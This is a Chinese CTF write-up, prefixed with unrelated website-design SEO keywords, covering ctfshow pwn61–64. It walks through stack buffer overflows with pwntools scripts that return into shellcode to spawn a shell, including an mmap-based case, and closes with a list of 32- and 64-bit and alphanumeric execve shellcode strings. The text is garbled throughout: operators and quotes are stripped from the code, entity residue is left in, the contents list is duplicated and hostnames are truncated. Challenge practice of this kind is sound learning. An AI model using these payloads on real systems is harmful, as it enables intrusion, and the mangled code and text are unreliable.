品牌网站设计公司价格,自己做的网站改变字体,江苏企业网站建设公司,网站设计编程目录
前言
一、pwn61#xff08;输出了什么#xff1f;#xff09;
二、pwn62#xff08;短了一点#xff09;
三、pwn63(又短了一点)
四、pwn64(有时候开启某种保护并不代表这条路不通)
五、一些shellcode 前言
这几道都是与shellcode有关的题#xff0c;实在是…目录
前言
一、pwn61输出了什么
二、pwn62短了一点
三、pwn63(又短了一点)
四、pwn64(有时候开启某种保护并不代表这条路不通)
五、一些shellcode 前言
这几道都是与shellcode有关的题实在是不会写还是试了试记录一下收集了一些shellcode。 一、pwn61输出了什么?
checksec 一下
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --filepwn61
[*] /home/kali/桌面/ctfshoww/pwn61Arch: amd64-64-littleRELRO: Partial RELROStack: No canary foundNX: NX unknown - GNU_STACK missingPIE: PIE enabledStack: ExecutableRWX: Has RWX segments
Stripped: No
开了地址随机化。
现在先看一下main函数
int __cdecl main(int argc, const char **argv, const char **envp)
{__int64 v4; // [sp0h] [bp-10h]1__int64 v5; // [sp8h] [bp-8h]1v4 0LL;v5 0LL;setvbuf(_bss_start, 0LL, 1, 0LL);logo();puts(Welcome to CTFshow!);printf(Whats this : [%p] ?\n, v4, 0LL, 0LL);puts(Maybe its useful ! But how to use it?);gets(v4);return 0;
}
主要是打印logo信息值得注意的是会输出一个地址查看一下v4:
0x10x08,我们写入shellcode以后通过返回v4的地址取让程序执行shellcode
本地运行一下
Welcome to CTFshow!
Whats this : [0x7ffdb824c790] ?
Maybe its useful ! But how to use it?
v4ar0x7ffd9de01430
一开始我就是这样写的
from pwn import *
context.log_leveldebug
context.archamd64
premote(pwn.challenge.ctf.show,28164)
padba*(0x100x8)
v4ar0x7ffdb824c790
shellcodeasm(shellcraft.sh())
payload1padp64(v4ar)shellcode
p.sendline(payload1)
p.interactive()
发现打不通似乎忽略了一些东西于是去读了大佬们的文章。
遇到的一个问题是shellcode太长超出了v4,v5的范围这是为什么呢 Shellcode 的长度通常会超过 v5 的空间8 字节。如果直接覆盖 v5Shellcode 的部分内容可能会被截断。此外leave ret 之后程序可能会跳转到一个无效地址导致崩溃。 去搜索了一下leave
等价于 mov rsp, rbp 和 pop rbp。
它将 rbp 的值赋给 rsp从而恢复上一个栈帧的栈指针。
然后从栈上弹出 rbp 的值恢复上一个栈帧的基指针。 所以我们把shellcode写在v5后面就是padb’a’*0x8的位置因为还有一个返回地址的位置.
还有就是输出的地址是动态的每次不一样。
from pwn import *
context(archamd64,log_leveldebug)
premote(pwn.challenge.ctf.show,28297)
pad0x108
shellcode asm(shellcraft.sh())
p.recvuntil(Whats this : [)
v5ar eval(p.recvuntil(b],dropTrue))
#dropTrue是为去掉]
#eval()是将str数据转为整型数据
print(hex(v5ar))
payloadflat([cyclic(pad),v5arpad8,shellcode])
p.sendline(payload)
p.interactive() 注意返回地址v5的地址加pad8,不是填充字符。 二、pwn62短了一点
checksec和上一道题差不多:
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --filepwn62
[*] /home/kali/桌面/ctfshoww/pwn62Arch: amd64-64-littleRELRO: Partial RELROStack: No canary foundNX: NX unknown - GNU_STACK missingPIE: PIE enabledStack: ExecutableRWX: Has RWX segments
Stripped: No
也是地址随机化提前运行的界面和上一道题差不多会给一个地址。
拖进ida看一看。
看一下main函数
int __cdecl main(int argc, const char **argv, const char **envp)
{FILE *v3; // rdi1__int64 buf; // [sp0h] [bp-10h]1__int64 v6; // [sp8h] [bp-8h]1buf 0LL;v6 0LL;v3 _bss_start;setvbuf(_bss_start, 0LL, 1, 0LL);logo(v3, 0LL);puts(Welcome to CTFshow!);printf(Whats this : [%p] ?\n, buf, 0LL, 0LL);puts(Maybe its useful ! But how to use it?);read(0, buf, 0x38uLL);return 0;
}
看一下这个buf:
-0000000000000010 buf dq ?
-0000000000000008 var_8 dq ?
0000000000000000 s db 8 dup(?)
0000000000000008 r db 8 dup(?)0x100x8
这里的shellcode是有限制的。
from pwn import *
context(archamd64,log_leveldebug)
premote(pwn.challenge.ctf.show,28295)
offset0x100x8
p.recvuntil([)
buf_areval(p.recvuntil(b],dropTrue))
print(hex(buf_ar))
shellcodeb\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
payloadoffset*bap64(buf_aroffset8)shellcode
p.sendline(payload)
p.interactive()三、pwn63(又短了一点)
checksec一下 [*] You have the latest version of Pwntools (4.14.0)
[*] /home/kali/桌面/ctfshoww/pwn63Arch: amd64-64-littleRELRO: Partial RELROStack: No canary foundNX: NX unknown - GNU_STACK missingPIE: PIE enabledStack: ExecutableRWX: Has RWX segments
Stripped: No开了地址随机化拖进ida看一看和上一道题有什么区别。
确实有一些变化 puts(Maybe its useful ! But how to use it?);read(0, buf, 0x37uLL);
看一下buf
-0000000000000010 buf dq ?
-0000000000000008 var_8 dq ?
0000000000000000 s db 8 dup(?)
0000000000000008 r db 8 dup(?)
0x100x8
from pwn import *
context(archamd64,log_leveldebug)
premote(pwn.challenge.ctf.show,28222)
offset0x100x8
p.recvuntil([)
buf_areval(p.recvuntil(b],dropTrue))
print(hex(buf_ar))
shellb\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
payloadoffset*bap64(buf_aroffset8)shell
p.sendline(payload)
p.interactive() 四、pwn64(有时候开启某种保护并不代表这条路不通)
有点意思先checksec一下
┌──(kali㉿kali)-[~/桌面/ctfshoww]
└─$ checksec --filepwn64
[*] /home/kali/桌面/ctfshoww/pwn64Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x8048000)
Stripped: No
虽然开了栈不可执行但是程序里有不一样的东西
buf mmap(0, 0x400u, 7, 34, 0, 0);
一开始我也不知道这是什么查了一下
mmap 是一个系统调用用于创建一个内存映射区域。它通常用于以下场景
·映射文件到内存以便可以像访问内存一样访问文件内容。
·创建匿名内存区域用于分配动态内存。
·共享内存用于进程间通信。
根据之前学的知识7port参数是可读可写的意思所以我们任然可以注入shellcode。
void* mmap(void* addr, size_t length, int prot, int flags, int fd, off_t offset);
0x400字节足够我们放下shellcode,总之试一试
from pwn import *
premote(wn.challenge.ctf.show,28201)
shellcodeasm(shellcraft.sh())
payloadshellcode
p.sendline(payload)
p.interactive()
打通之后快些ls,因为有定时器如果想更长一点可以加一段shellcode但是用处不大因为我也不太会写shellcode,所以问了问人机了解了一下
from pwn import *
premote(wn.challenge.ctf.show,28201)
alarm_closeasm(mov eax,37xor ebx,ebxint 0x80
,archi386)
shellcodeasm(shellcraft.sh())
payloadalarm_closeshellcode
p.sendline(payload)
p.interactive() 五、一些shellcode
关于shellcode我也不会写所以去搜了一些shellcode一般情况下还是能用的。
不可见
32位段字节shellcode21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
64位较短的shellcode23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
可见版本由可见字符组成
X64:
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
32位
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIRJTKV8MIPR2FU86M3SLIZG2H6O43SX30586OCRCYBNLIM3QBKXDHS0C0EPVOE22IBNFO3CBH5P0WQCK9KQXMK0AA 继续学习中......
